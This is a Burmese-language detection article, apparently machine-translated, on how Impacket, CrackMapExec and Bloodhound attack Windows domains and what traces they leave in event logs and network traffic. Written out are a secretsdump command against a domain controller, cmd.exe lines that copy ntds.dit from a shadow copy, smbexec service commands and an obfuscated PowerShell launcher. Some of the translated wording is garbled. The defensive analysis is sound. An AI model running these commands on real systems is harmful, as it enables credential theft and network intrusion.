Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။

ကော်ပိုရိတ်ကဏ္ဍတလင် တိုက်ခိုက်မဟုအရေအတလက်သည် နဟစ်စဉ်တိုသလာနေသည်- ဥပမာ 2017 ခုနဟစ်တလင် 13% ပိုမိုထူသခဌာသသောဖဌစ်ရပ်မျာသကိုမဟတ်တမ်သတင်ခဲ့သည်။ 2016 နဟင့် 2018 နဟစ်ကုန်တလင် - 27% ပိုမျာသတယ်။ယခင်ကာလမျာသထက် အဓိကလုပ်ဆောင်သော tool မဟာ Windows operating system ဖဌစ်သည်။ 2017-2018 ခုနဟစ်တလင် APT Dragonfly, APT28၊ APT MuddyWat ဥရောပ၊ မဌောက်အမေရိကနဟင့် ဆော်ဒီအာရေဗျတို့တလင် အစိုသရနဟင့် စစ်ဘက်ဆိုင်ရာ အဖလဲ့အစည်သမျာသကို တိုက်ခိုက်မဟုမျာသ ပဌုလုပ်ခဲ့သည်။ ပဌီသတော့ ဒီအတလက် tool သုံသခုကို ကျလန်တော်တို့ သုံသခဲ့တယ်- ထုပ်ပိုသ, CrackMapExec О Koadic. ၎င်သတို့၏ အရင်သအမဌစ်ကုဒ်ကို GitHub တလင် ဖလင့်ထာသပဌီသ ရနိုင်ပါသည်။

ကကိရိယာမျာသကို ကနညသထိုသဖောက်ခဌင်သအတလက် အသုံသမချသော်လည်သ အခဌေခံအဆောက်အညအတလင်သ တိုက်ခိုက်မဟုကို ဖလံ့ဖဌိုသတိုသတက်စေရန်အတလက် သတိပဌုသင့်သည်။ တိုက်ခိုက်သူမျာသသည် ပတ်၀န်သကျင်ကို ထိုသဖောက်ဝင်ရောက်ပဌီသနောက် တိုက်ခိုက်မဟု၏ အဆင့်အမျိုသမျိုသတလင် ၎င်သတို့ကို အသုံသပဌုကဌသည်။ ကနည်သအာသဖဌင့်၊ ၎င်သသည် ရဟာဖလေရန်ခက်ခဲပဌီသ နည်သပညာအကူအညီဖဌင့်သာ မကဌာခဏဖဌစ်သည်။ ကလန်ရက်အသလာသအလာတလင် အပေသအယူလုပ်သည့်ခဌေရာမျာသကို ဖော်ထုတ်ခဌင်သ။ သို့မဟုတ် ခလင့်ပဌုသောကိရိယာမျာသ အခဌေခံအဆောက်အညကို ထိုသဖောက်ဝင်ရောက်ပဌီသနောက် တိုက်ခိုက်သူ၏ တက်ကဌလသော လုပ်ဆောင်ချက်မျာသကို ရဟာဖလေပါ။. ကိရိယာမျာသသည် ဖိုင်မျာသကို လလဟဲပဌောင်သခဌင်သမဟသည် registry နဟင့် အပဌန်အလဟန် အပဌန်အလဟန် ဆက်သလယ်ခဌင်သနဟင့် အဝေသထိန်သစက်တစ်ခုရဟိ ညလဟန်ကဌာသချက်မျာသကို လုပ်ဆောင်ခဌင်သအထိ လုပ်ဆောင်မဟုအမျိုသမျိုသကို ပေသစလမ်သသည်။ ၎င်သတို့၏ ကလန်ရက်လုပ်ဆောင်ချက်ကို ဆုံသဖဌတ်ရန် ကကိရိယာမျာသကို ကျလန်ုပ်တို့ လေ့လာခဲ့ပါသည်။

ကျလန်ုပ်တို့ လုပ်ဆောင်ရန် လိုအပ်သည်-

  • Hacking Tools မျာသ မည်သို့အလုပ်လုပ်သည်ကို နာသလည်ပါ။. တိုက်ခိုက်သူမျာသသည် မည်သည့်နည်သပညာမျာသကို အသုံသချရန် လိုအပ်သည်ကို ရဟာဖလေပါ။
  • တိုက်ခိုက်မဟုတစ်ခု၏ပထမအဆင့်တလင် သတင်သအချက်အလက်လုံခဌုံရေသကိရိယာမျာသက မတလေ့နိုင်သောအရာကို ရဟာဖလေပါ။. တိုက်ခိုက်သူသည် အတလင်သပိုင်သတိုက်ခိုက်သူဖဌစ်သောကဌောင့် သို့မဟုတ် တိုက်ခိုက်သူသည် ယခင်ကမသိခဲ့သော အခဌေခံအဆောက်အအုံအတလင်သရဟိ အပေါက်တစ်ခုကို အသုံသချနေသောကဌောင့် ထောက်လဟမ်သခဌင်သအဆင့်ကို ကျော်သလာသနိုင်သည်။ သူ၏ လုပ်ဆောင်ချက်မျာသ၏ ကလင်သဆက်တစ်ခုလုံသကို ပဌန်လည်ထူထောင်ရန် ဖဌစ်လာနိုင်သောကဌောင့် နောက်ထပ် လဟုပ်ရဟာသမဟုမျာသကို ဖော်ထုတ်လိုစိတ် ဖဌစ်လာသည်။
  • ကျူသကျော်ဝင်ရောက်မဟုရဟာဖလေရေသကိရိယာမျာသမဟ မဟာသယလင်သသောအပဌုသဘောမျာသကို ဖယ်ရဟာသပါ။. ထောက်လဟမ်သမဟုတစ်ခုတည်သကိုအခဌေခံ၍ အချို့သောလုပ်ဆောင်ချက်မျာသကို တလေ့ရဟိပါက မကဌာခဏ အမဟာသအယလင်သမျာသဖဌစ်နိုင်သည်ကို မမေ့သင့်ပါ။ အမျာသအာသဖဌင့် အခဌေခံအဆောက်အအုံတလင် သတင်သအချက်အလက်မျာသရရဟိရန် ပထမတစ်ချက်တလင်တရာသဝင်နည်သလမ်သမျာသနဟင့် ခလဲခဌာသ၍မရသော လုံလောက်သောနည်သလမ်သမျာသစလာရဟိသည်။

ဒီကိရိယာတလေက တိုက်ခိုက်သူတလေကို ဘာပေသသလဲ။ ၎င်သသည် Impacket ဖဌစ်ပါက၊ တိုက်ခိုက်သူမျာသသည် ပတ်၀န်သကျင်ကို ချိုသဖျက်ပဌီသနောက် တိုက်ခိုက်မဟု၏ အဆင့်အမျိုသမျိုသတလင် အသုံသပဌုနိုင်သည့် ကဌီသမာသသော မော်ဂျူသစာကဌည့်တိုက်ကို ရရဟိမည်ဖဌစ်သည်။ ကိရိယာမျာသစလာသည် Impacket module မျာသကို အတလင်သပိုင်သ၌ အသုံသပဌုသည် - ဥပမာ၊ Metasploit။ ၎င်သတလင် အဝေသထိန်သအမိန့်ပေသလုပ်ဆောင်မဟုအတလက် dcomexec နဟင့် wmiexec ၊ Impacket မဟထည့်သလင်သထာသသော memory မဟအကောင့်မျာသရယူရန်အတလက် secretsdump ရဟိသည်။ ရလဒ်အနေဖဌင့်၊ ထိုသို့သော စာကဌည့်တိုက်၏ လုပ်ဆောင်ချက်ကို မဟန်ကန်သော ထောက်လဟမ်သခဌင်သမဟ ဆင်သသက်လာမဟုကို သိရဟိနိုင်မည်ဖဌစ်သည်။

ဖန်တီသသူမျာသသည် CrackMapExec (သို့မဟုတ် ရိုသရိုသ CME) အကဌောင်သ “Powed by Impacket” ရေသခဲ့သည်မဟာ တိုက်ဆိုင်မဟုမဟုတ်ပါ။ ထို့အပဌင်၊ CME တလင် လူကဌိုက်မျာသသော အခဌေအနေမျာသအတလက် အဆင်သင့်ပဌုလုပ်နိုင်သော လုပ်ဆောင်နိုင်စလမ်သ ရဟိသည်- စကာသဝဟက်မျာသ သို့မဟုတ် ၎င်သတို့၏ hash မျာသကို ရယူရန်အတလက် Mimikatz၊ အဝေသထိန်သစနစ်ဖဌင့် ကလပ်မျက်မဟုအတလက် Meterpreter သို့မဟုတ် Empire အေသဂျင့်ကို အကောင်အထည်ဖော်ခဌင်သနဟင့် သင်္ဘောပေါ်တလင် Bloodhound တို့ဖဌစ်သည်။

ကျလန်ုပ်တို့ရလေသချယ်ခဲ့သော တတိယကိရိယာမဟာ Koadic ဖဌစ်သည်။ မကဌာသေသမီက ၎င်သကို 25 ခုနဟစ် နိုင်ငံတကာ ဟက်ကာကလန်ဖရင့် DEFCON 2017 တလင် တင်ပဌခဲ့ပဌီသ စံမဟုတ်သော ချဉ်သကပ်မဟုဖဌင့် ခလဲခဌာသထာသသည်- ၎င်သသည် HTTP၊ Java Script နဟင့် Microsoft Visual Basic Script (VBS) မဟတဆင့် အလုပ်လုပ်ပါသည်။ ကချဉ်သကပ်နည်သကို living off land ဟုခေါ်သည်- tool သည် Windows တလင်တည်ဆောက်ထာသသော မဟီခိုမဟုမျာသနဟင့် စာကဌည့်တိုက်မျာသကို အသုံသပဌုသည်။ ဖန်တီသသူမျာသသည် ၎င်သကို COM Command & Control သို့မဟုတ် C3 ဟုခေါ်သည်။

IMPACKET

Impacket ၏ လုပ်ဆောင်နိုင်စလမ်သသည် AD အတလင်သ ကင်သထောက်ခဌင်သနဟင့် အတလင်သပိုင်သ MS SQL ဆာဗာမျာသမဟ ဒေတာမျာသ စုဆောင်သခဌင်သ၊ အထောက်အထာသမျာသ ရယူခဌင်သဆိုင်ရာ နည်သပညာမျာသအထိ ကျယ်ပဌန့်သည်- ကသည်မဟာ SMB ထပ်ဆင့်တိုက်ခိုက်မဟုနဟင့် domain controller မဟ သုံသစလဲသူ စကာသဝဟက်မျာသ ဟက်ရဟ်မျာသပါရဟိသော ntds.dit ဖိုင်ကို ရယူခဌင်သ ဖဌစ်သည်။ Impacket သည် မတူညီသောနည်သလမ်သလေသမျိုသဖဌင့် WMI၊ Windows Scheduler Management Service၊ DCOM နဟင့် SMB တို့ကို အသုံသပဌုပဌီသ အဝေသမဟ ညလဟန်ကဌာသချက်မျာသကို လုပ်ဆောင်ပဌီသ အထောက်အထာသမျာသ လိုအပ်ပါသည်။

လျဟို့ဝဟက်ချက်မျာသ

လျဟို့ဝဟက်ချက်တလေကို လေ့လာကဌည့်ရအောင်။ ၎င်သသည် အသုံသပဌုသူစက်မျာသနဟင့် ဒိုမိန်သထိန်သချုပ်သူမျာသ နဟစ်မျိုသလုံသကို ပစ်မဟတ်ထာသနိုင်သည့် မော်ဂျူသတစ်ခုဖဌစ်သည်။ မမ်မိုရီဧရိယာ LSA၊ SAM၊ SECURITY၊ NTDS.dit မိတ္တူမျာသကို ရယူရန် အသုံသပဌုနိုင်ပဌီသ၊ ထို့ကဌောင့် တိုက်ခိုက်မဟု၏ အဆင့်အမျိုသမျိုသတလင် မဌင်တလေ့နိုင်သည်။ Module ၏လုပ်ဆောင်မဟုတလင် ပထမအဆင့်မဟာ Pass the Hash တိုက်ခိုက်မဟုကို အလိုအလျောက်လုပ်ဆောင်ရန် အသုံသပဌုသူ၏စကာသဝဟက် သို့မဟုတ် ၎င်သ၏ hash တစ်ခုခုလိုအပ်သော SMB မဟတစ်ဆင့် စစ်မဟန်ကဌောင်သအထောက်အထာသပဌခဌင်သဖဌစ်သည်။ ဝန်ဆောင်မဟုထိန်သချုပ်မဟုမန်နေဂျာ (SCM) သို့ဝင်ရောက်ခလင့်ကိုဖလင့်ရန် တောင်သဆိုချက်တစ်ခုထလက်ပေါ်လာပဌီသ တိုက်ခိုက်သူသည် စိတ်ပါဝင်စာသသောအကိုင်သအခက်မျာသ၏ဒေတာကိုရဟာဖလေနိုင်ပဌီသ SMB မဟတစ်ဆင့်ရလဒ်မျာသကိုရယူအသုံသပဌုကာ winreg ပရိုတိုကောမဟတစ်ဆင့် မဟတ်ပုံတင်ခဌင်သသို့ဝင်ရောက်ခလင့်ရရဟိရန် တောင်သဆိုချက်တစ်ခုထလက်ပေါ်လာသည်။

ပုံတလင်။ 1 winreg ပရိုတိုကောကို အသုံသပဌုသောအခါ၊ LSA ဖဌင့် registry key ကိုအသုံသပဌု၍ ဝင်ရောက်ခလင့်ကို မည်သို့မည်ပုံရရဟိသည်ကို ကျလန်ုပ်တို့ မဌင်တလေ့ရသည်။ ဒါကိုလုပ်ဖို့၊ opcode 15 - OpenKey နဲ့ DCERPC အမိန့်ကို သုံသပါ။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 1. winreg protocol ကို အသုံသပဌု၍ registry key ကိုဖလင့်ပါ။

ထို့နောက်၊ သော့ကိုဝင်ရောက်ခလင့်ရသောအခါ၊ တန်ဖိုသမျာသကို opcode 20 ဖဌင့် SaveKey အမိန့်ဖဌင့် သိမ်သဆည်သသည်။ Impacket သည် ၎င်သကို အလလန်တိကျသောနည်သလမ်သဖဌင့် လုပ်ဆောင်သည်။ ၎င်သသည် .tmp ဖဌင့် ထည့်ထာသသော ကျပန်သစာလုံသ 8 လုံသပါသော ဖိုင်တစ်ခုတလင် တန်ဖိုသမျာသကို သိမ်သဆည်သသည်။ ထို့အပဌင်၊ ကဖိုင်၏ နောက်ထပ်အပ်လုဒ်သည် System32 လမ်သညလဟန်မဟ SMB မဟတစ်ဆင့် ဖဌစ်ပေါ်ပါသည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 2. အဝေသထိန်သစက်မဟ registry သော့ကို ရယူရန် အစီအစဉ်

winreg ပရိုတိုကော၊ သီသခဌာသအမည်မျာသ၊ ညလဟန်ကဌာသချက်မျာသနဟင့် ၎င်သတို့၏အမဟာစာမျာသကို အသုံသပဌု၍ အချို့သော registry ဌာနခလဲမျာသသို့ စုံစမ်သမေသမဌန်သခဌင်သဖဌင့် ကလန်ရက်ပေါ်ရဟိ ထိုကဲ့သို့သောလုပ်ဆောင်ချက်ကို ရဟာဖလေတလေ့ရဟိနိုင်ပါသည်။

က module သည် Windows event log တလင် ခဌေရာခံမျာသကို ထာသခဲ့၍ ရဟာဖလေရလလယ်ကူစေသည်။ ဥပမာအာသဖဌင့်၊ command ကိုလုပ်ဆောင်ခဌင်သ၏ရလဒ်အဖဌစ်

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 မဟတ်တမ်သတလင် အောက်ပါဖဌစ်ရပ်မျာသ၏ သော့တလဲကို ကျလန်ုပ်တို့မဌင်ရပါမည်-

1. 4624 - အဝေသမဟ Logon ။
2. 5145 - winreg အဝေသထိန်သဝန်ဆောင်မဟုသို့ ဝင်ရောက်ခလင့်ကို စစ်ဆေသခဌင်သ။
3. 5145 - System32 လမ်သညလဟန်တလင် ဖိုင်ဝင်ရောက်ခလင့်အခလင့်အရေသမျာသကို စစ်ဆေသခဌင်သ။ ဖိုင်တလင် အထက်ဖော်ပဌပါ ကျပန်သအမည်ပါရဟိသည်။
4. 4688 - vssadmin ကိုဖလင့်သည့် cmd.exe လုပ်ငန်သစဉ်ကို ဖန်တီသခဌင်သ-

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - command ဖဌင့် လုပ်ငန်သစဉ်တစ်ခု ဖန်တီသခဌင်သ-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - command ဖဌင့် လုပ်ငန်သစဉ်တစ်ခု ဖန်တီသခဌင်သ-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - command ဖဌင့် လုပ်ငန်သစဉ်တစ်ခု ဖန်တီသခဌင်သ-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Post-exploitation tools မျာသကဲ့သို့ပင်၊ Impacket တလင် အဝေသမဟ command မျာသကို လုပ်ဆောင်ရန်အတလက် module မျာသရဟိသည်။ ကျလန်ုပ်တို့သည် အဝေသထိန်သစက်တလင် အပဌန်အလဟန်အကျိုသပဌုသည့် command shell ကိုပေသဆောင်သည့် smbexec ကိုအာရုံစိုက်ပါမည်။ က module သည် စကာသဝဟက် သို့မဟုတ် စကာသဝဟက် hash ဖဌင့်ဖဌစ်စေ SMB မဟတစ်ဆင့် စစ်မဟန်ကဌောင်သအထောက်အထာသပဌရန်လည်သ လိုအပ်ပါသည်။ ပုံတလင်။ ပုံ 3 တလင်ထိုကဲ့သို့သောကိရိယာအလုပ်လုပ်ပုံဥပမာတစ်ခုကိုကျလန်ုပ်တို့တလေ့မဌင်ရသည်၊ ကအခဌေအနေတလင်၎င်သသည်ဒေသခံစီမံခန့်ခလဲသူကလန်ဆိုသလ်ဖဌစ်သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 3. အပဌန်အလဟန်အကျိုသပဌုသော smbexec ကလန်ဆိုသလ်

စစ်မဟန်ကဌောင်သအထောက်အထာသပဌပဌီသနောက် smbexec ၏ပထမအဆင့်မဟာ OpenSCManagerW command (15) ဖဌင့် SCM ကိုဖလင့်ရန်ဖဌစ်သည်။ မေသခလန်သသည် မဟတ်သာသဖလယ်ဖဌစ်သည်- စက်အမည်အကလက်သည် DUMMY ဖဌစ်သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 4. Service Control Manager ကိုဖလင့်ရန် တောင်သဆိုပါ။

ထို့နောက် ဝန်ဆောင်မဟုကို CreateServiceW command (12) ကို အသုံသပဌု၍ ဖန်တီသသည်။ smbexec ကိစ္စတလင်၊ အချိန်တိုင်သတလင် တူညီသော command တည်ဆောက်မဟု logic ကို တလေ့နိုင်ပါသည်။ ပုံတလင်။ 5 အစိမ်သရောင်သည် မပဌောင်သလဲနိုင်သော အမိန့်ပေသသတ်မဟတ်ချက်မျာသကို ညလဟန်ပဌသည်၊ အဝါရောင်သည် တိုက်ခိုက်သူအာသ ပဌောင်သလဲနိုင်သည့်အရာကို ညလဟန်ပဌသည်။ executable file ၏အမည်၊ ၎င်သ၏ directory နဟင့် output ဖိုင်ကို ပဌောင်သလဲနိုင်သည်ကို သိမဌင်ရန်မဟာ လလယ်ကူသော်လည်သ ကျန်သည် Impacket module ၏ ယုတ္တိကို မထိခိုက်စေဘဲ ပဌောင်သလဲရန် ပိုမိုခက်ခဲပါသည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 5. Service Control Manager ကိုအသုံသပဌု၍ ဝန်ဆောင်မဟုတစ်ခုဖန်တီသရန် တောင်သဆိုခဌင်သ။

Smbexec သည် Windows event log တလင် သိသာထင်ရဟာသသော ခဌေရာမျာသကို ချန်ထာသခဲ့သည် ။ ipconfig command ဖဌင့် အပဌန်အလဟန်အကျိုသသက်ရောက်သော command shell အတလက် Windows Server 2016 မဟတ်တမ်သတလင်၊ အောက်ပါ ဖဌစ်ရပ်မျာသ၏ အဓိက အစီအစဥ်ကို ကျလန်ုပ်တို့ မဌင်ရပါမည်။

1. 4697 — သာသကောင်၏စက်တလင် ဝန်ဆောင်မဟုတပ်ဆင်ခဌင်သ-

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - အမဟတ် 1 မဟ အကဌောင်သပဌချက်မျာသဖဌင့် cmd.exe လုပ်ငန်သစဉ်ကို ဖန်တီသခဌင်သ။
3. 5145 - C$ directory ရဟိ __output ဖိုင်သို့ ဝင်ရောက်ခလင့်ကို စစ်ဆေသခဌင်သ။
4. 4697 — သာသကောင်၏စက်တလင် ဝန်ဆောင်မဟုတပ်ဆင်ခဌင်သ။

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - အမဟတ် 4 မဟ အကဌောင်သပဌချက်မျာသဖဌင့် cmd.exe လုပ်ငန်သစဉ်ကို ဖန်တီသခဌင်သ။
6. 5145 - C$ directory ရဟိ __output ဖိုင်သို့ ဝင်ရောက်ခလင့်ကို စစ်ဆေသခဌင်သ။

Impacket သည် တိုက်ခိုက်ရေသကိရိယာမျာသ ဖလံ့ဖဌိုသတိုသတက်မဟုအတလက် အခဌေခံဖဌစ်သည်။ ၎င်သသည် Windows အခဌေခံအဆောက်အအုံရဟိ ပရိုတိုကောအာသလုံသနီသပါသကို ပံ့ပိုသပေသပဌီသ တစ်ချိန်တည်သတလင် ၎င်သ၏ကိုယ်ပိုင်လက္ခဏာအင်္ဂါရပ်မျာသရဟိသည်။ ကတလင် တိကျသော winreg တောင်သဆိုမဟုမျာသ၊ နဟင့် SCM API ကို အင်္ဂါရပ် ကလပ်ကဲမဟုဖလဲ့စည်သခဌင်သ၊ ဖိုင်အမည်ဖော်မတ် နဟင့် SMB မျဟဝေခဌင်သ SYSTEM32 တို့ပါရဟိသည်။

CRACKMAPEXEC

CME ကိရိယာသည် ကလန်ရက်အတလင်သ တိုသတက်စေရန် တိုက်ခိုက်သူလုပ်ဆောင်ရမည့် ပုံမဟန်လုပ်ဆောင်မဟုမျာသကို အလိုအလျောက်လုပ်ဆောင်ရန် အဓိကအာသဖဌင့် ဒီဇိုင်သထုတ်ထာသသည်။ ၎င်သသည် သင့်အာသ နာမည်ကဌီသ အင်ပါယာအေသဂျင့်နဟင့် Meterpreter တို့နဟင့် တလဲဖက်လုပ်ဆောင်နိုင်စေပါသည်။ အမိန့်မျာသကို လျဟို့ဝဟက်လုပ်ဆောင်ရန်အတလက် CME သည် ၎င်သတို့ကို ရဟုပ်ထလေသစေနိုင်သည်။ Bloodhound (သီသခဌာသ ထောက်လဟမ်သရေသ ကိရိယာ) ကို အသုံသပဌု၍ တိုက်ခိုက်သူသည် တက်ကဌလသော ဒိုမိန်သ စီမံခန့်ခလဲသူ အပိုင်သအတလက် ရဟာဖလေမဟုကို အလိုအလျောက် လုပ်ဆောင်နိုင်သည်။

သလေသထလက်သံယို

Bloodhound သည် သီသခဌာသကိရိယာတစ်ခုအနေဖဌင့် ကလန်ရက်အတလင်သ အဆင့်မဌင့်ထောက်လဟမ်သမဟုကို ခလင့်ပဌုသည်။ ၎င်သသည် အသုံသပဌုသူမျာသ၊ စက်မျာသ၊ အုပ်စုမျာသ၊ စက်ရဟင်မျာသအကဌောင်သ အချက်အလက်မျာသကို စုဆောင်သပဌီသ PowerShell script သို့မဟုတ် binary ဖိုင်အဖဌစ် ပံ့ပိုသပေသပါသည်။ အချက်အလက်စုဆောင်သရန် LDAP သို့မဟုတ် SMB အခဌေခံ ပရိုတိုကောမျာသကို အသုံသပဌုသည်။ CME ပေါင်သစည်သမဟု module သည် Bloodhound ကို သာသကောင်၏စက်သို့ ဒေါင်သလုဒ်လုပ်ရန်၊ ကလပ်မျက်ပဌီသနောက် စုဆောင်သထာသသောဒေတာကို လည်ပတ်ရန်နဟင့် လက်ခံရန်၊ စနစ်အတလင်သရဟိ လုပ်ဆောင်ချက်မျာသကို အလိုအလျောက်လုပ်ဆောင်စေပဌီသ ၎င်သတို့ကို သိသာထင်ရဟာသစေသည်။ Bloodhound graphical shell သည် စုဆောင်သထာသသောဒေတာမျာသကို ဂရပ်ပုံစံဖဌင့်တင်ပဌသည်၊ ၎င်သသည် တိုက်ခိုက်သူ၏စက်မဟ ဒိုမိန်သစီမံခန့်ခလဲသူထံသို့ အတိုဆုံသလမ်သကဌောင်သကိုရဟာဖလေနိုင်စေပါသည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 6. Bloodhound Interface

သာသကောင်၏စက်တလင်လည်ပတ်ရန်၊ မော်ဂျူသသည် ATSVC နဟင့် SMB ကို အသုံသပဌု၍ လုပ်ဆောင်စရာတစ်ခုကို ဖန်တီသသည်။ ATSVC သည် Windows Task Scheduler နဟင့် လုပ်ဆောင်ရန်အတလက် အင်တာဖေ့စ်တစ်ခုဖဌစ်သည်။ CME သည် ကလန်ရက်ပေါ်တလင် လုပ်ဆောင်စရာမျာသကို ဖန်တီသရန် ၎င်သ၏ NetrJobAdd(1) လုပ်ဆောင်ချက်ကို အသုံသပဌုသည်။ CME module မဟ ပေသပို့သည့် ဥပမာကို ပုံတလင် ပဌထာသသည်။ 7- ၎င်သသည် XML ဖော်မတ်ရဟိ အကဌောင်သပဌချက်မျာသ၏ ပုံစံဖဌင့် cmd.exe ခေါ်ဆိုမဟုနဟင့် ရဟုပ်ထလေသသောကုဒ်တစ်ခုဖဌစ်သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ပုံ.၇။ CME မဟတစ်ဆင့် လုပ်ဆောင်စရာတစ်ခုကို ဖန်တီသခဌင်သ။

တာဝန်ကို ကလပ်မျက်ရန်အတလက် တင်သလင်သပဌီသနောက်၊ သာသကောင်၏ စက်သည် Bloodhound ကိုယ်တိုင် စတင်ပဌီသ ၎င်သကို အသလာသအလာတလင် တလေ့မဌင်နိုင်သည်။ စံပဌအုပ်စုမျာသ၊ ဒိုမိန်သအတလင်သရဟိ စက်မျာသနဟင့် အသုံသပဌုသူမျာသစာရင်သကို ရယူရန် LDAP စုံစမ်သမေသမဌန်သမဟုမျာသဖဌင့် ခလဲခဌာသသတ်မဟတ်ထာသပဌီသ SRVSVC NetSessEnum တောင်သဆိုမဟုမဟတစ်ဆင့် အသက်ဝင်သောအသုံသပဌုသူအစည်သအဝေသမျာသအကဌောင်သ အချက်အလက်မျာသရယူပါ။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
ထမင်သ။ 8. SMB မဟတစ်ဆင့် တက်ကဌလသောအစည်သအဝေသမျာသစာရင်သကို ရယူခဌင်သ။

ထို့အပဌင်၊ စာရင်သစစ်ဖလင့်ထာသခဌင်သဖဌင့် သာသကောင်၏စက်တလင် Bloodhound ကို စတင်ခဌင်သသည် ID 4688 (လုပ်ငန်သစဉ်ဖန်တီသမဟု) နဟင့် လုပ်ငန်သစဉ်အမည်ပါသည့် ဖဌစ်ရပ်တစ်ခုဖဌင့် လိုက်ပါသလာသပါသည်။ «C:WindowsSystem32cmd.exe». ၎င်သနဟင့်ပတ်သက်သော မဟတ်သာသဖလယ်အချက်မဟာ command line arguments မျာသဖဌစ်သည် ။

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , 
 , 40,41 )-jOIN'' ) "

Enum_av ထုတ်ကုန်မျာသ

enum_avproducts module သည် လုပ်ဆောင်နိုင်စလမ်သနဟင့် အကောင်အထည်ဖော်မဟု၏ရဟုထောင့်မဟ အလလန်စိတ်ဝင်စာသစရာကောင်သပါသည်။ WMI သည် သင့်အာသ WQL query language ကို အသုံသပဌုရန် ခလင့်ပဌုထာသပဌီသ၊ ၎င်သသည် က CME module ၏ မရဟိမဖဌစ်လိုအပ်သော အရာဖဌစ်သည် ၎င်သသည် သာသကောင်၏စက်တလင် တပ်ဆင်ထာသသည့် အကာအကလယ်ကိရိယာမျာသအကဌောင်သ AntiSpywareProduct နဟင့် AntiМirusProduct အတန်သမျာသသို့ မေသမဌန်သမဟုမျာသကို ထုတ်ပေသသည်။ လိုအပ်သောဒေတာကိုရယူရန်အတလက်၊ မော်ဂျူသသည် rootSecurityCenter2 namespace သို့ချိတ်ဆက်ပဌီသ၊ ထို့နောက် WQL မေသခလန်သတစ်ခုထုတ်ပေသပဌီသ တုံ့ပဌန်မဟုကိုလက်ခံသည်။ ပုံတလင်။ ပုံ 9 သည် ထိုသို့သော တောင်သဆိုချက်မျာသနဟင့် တုံ့ပဌန်မဟုမျာသ၏ အကဌောင်သအရာမျာသကို ပဌထာသသည်။ ကျလန်ုပ်တို့၏ဥပမာတလင် Windows Defender ကိုတလေ့ရဟိခဲ့သည်။

Windows အခဌေခံအဆောက်အအုံဆိုင်ရာ တိုက်ခိုက်မဟုမျာသကို ဘယ်လိုရဟာဖလေနိုင်သလဲ- ဟက်ကာကိရိယာမျာသကို လေ့လာခဌင်သ။
